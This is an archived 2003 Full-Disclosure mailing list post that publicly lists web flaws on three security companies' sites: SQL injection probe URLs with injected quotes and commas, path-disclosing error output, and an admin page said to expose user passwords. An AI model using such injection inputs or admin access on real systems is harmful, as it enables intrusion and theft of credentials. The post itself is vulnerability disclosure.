lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: mordred at s-mail.com (Sir Mordred)
Subject: @(#)Mordred Labs security notice - exploring the security companies

// @(#)Mordred Labs security notice 0x0002

Name: Exploring the security companies (part one)
Release date: May 7, 2003
Author: Sir Mordred (mordred@...ail.com)

I. INTRODUCTION

This is a first part of security notice about security companies.
I'd split the original notice because of the amount information contained
in it.
The main topic of this notice is "bad coding habits", next time maybe we
will talk about
security audit and the source code audit in particular.

Also i should say - somehow i fell respect to people, who are doing
security and brave enough
to build a website with a dynamic content, not just a couple of html pages.
But sometimes crazy thought crosses my mind - maybe it is just a dumb
honeypot? :-)

The format for vulnerabilities is:

<number>) [hostname, the company name]
quotes, comments (if exists)
* ISSUE <number> - description of the vulnerability
blank line
comments (if exists)
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)

II. DETAILS

Now lets begin from the rather interesting security company  "e-matters",
and a couple of minutes brings us a several nice issues:

1) [ www.e-matters.de, e-matters ]

Though i do not understand German :-) it was very exciting to visit
e-matters website.
I thought - well, there is Stefan Esser out there, respected security
expert and PHP developer,
now i am gonna actually visit his company's website, and if i am happy
enough and if the website 
has some dynamic content i may find something very interesting ... i will
be changing url parameters,
puting single quotes, commas and all such shit ... :-)

Then i got interested in their flagship product - Webmail 3.0 as it has
demo account, and this brings us Issue 4.

Well, it was a real fun i should say, have you ever see the broken test.php
page? 
I did not.

How about customers.html page?
I think if  i was going to buy some e-matters products, i'd run away from
this site: 

* ISSUE 1 - /customers.html page is broken

Somehow this page is very broken and when you visit
http://www.e-matters.de/customers.html
you can see something like this:

Warning:  mysql_pconnect(): Access denied for user: 'root@...alhost' (Using
password: YES) in /domains/e-matters.de/ftp/html/customers.html on line 17
Warning:  mysql_select_db(): supplied argument is not a valid MySQL-Link
resource in /domains/e-matters.de/ftp/html/customers.html on line 18
Warning:  mysql_query(): supplied argument is not a valid MySQL-Link
resource in /domains/e-matters.de/ftp/html/customers.html on line 20
Warning:  mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /domains/e-matters.de/ftp/html/customers.html on line 21
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL
result resource in /domains/e-matters.de/ftp/html/customers.html on line 34

* ISSUE 2 - Path disclosure in /screenshotPopUp.html

http://www.e-matters.de/screenshotPopUp.html?INC=w&ID=1&

Warning:  main(./screenshots/wwebmail.inc.php): failed to open stream: No
such file or directory in
/domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15
Warning:  main(): Failed opening './screenshots/w.inc.php' for inclusion
(include_path='.:/usr/local/lib/php') in
/domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15

* ISSUE 3 - Path disclosure in /test.php page

http://webmail.e-matters.de/test.php

Parse error: parse error in /domains/e-matters.de/ftp/html/webmail/test.php
on line 4

* ISSUE 4 - Admin access to webmail.e-matters.de interface

The url http://webmail.e-matters.de/admin/ will happily display all users
along with their passwords.

2) [ www.ca.com, Computer Associates ]
<quote>
CA is a $3 billion revenue enterprise software company, providing
business-critical technology 
that serves as the backbone of commerce and shapes the way business is
conducted throughout the world.
</quote>

* ISSUE 1 - SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 2 - Another SQL injection in /qoutes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '1'.
/common/include/caADO.asp, line 243

* ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '88)) AND q.FKComp_ID =
20099 ORDER BY co.Comp_Name, Quotes_Date DESC'.
/common/include/caADO.asp, line 243

3) [ www.netegrity.com, Netegrity Inc. ]
<quote>
Netegrity, Inc. is a leading provider of security software solutions that
securely manage 
identities and their access to enterprise information assets, letting
business in while keeping risk out.
Netegrity provides a comprehensive identity and access management product
line for continuously evolving 
computing environments, including legacy, Web, and service-oriented
architectures.  
</quote>

* ISSUE 1 - SQL injection in /News/feature.cfm page

http://www.netegrity.com/News/feature.cfm?ArticleID=1,

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax
near ','.
The error occurred while processing an element with a general identifier of
(CFQUERY), occupying document position (24:1) to (24:55).

* ISSUE 2 - SQL injection in /News/PressRelease.cfm page

http://www.netegrity.com/News/PressRelease.cfm?ArticleId=1,1&leveltwo=PressR
eleases

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax
near ','.
The error occurred while processing an element with a general identifier of
(CFQUERY), occupying document position (24:1) to (24:55).

* ISSUE 3 - Path disclosure

http://www.netegrity.com/News/PressRelease_Archive.cfm?levelthree=2000&relea
se=nul

Cannot open CFML file
The requested file "C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML"
cannot be found.
The specific sequence of files included or processed is:
C:\INETPUB\WWWROOT\2001\NEWS\PRESSRELEASE_ARCHIVE.CFM 
C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML  CFInclude

The error occurred while processing an element with a general identifier of
(CFINCLUDE), occupying document position (44:2) to (44:32).
  





________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ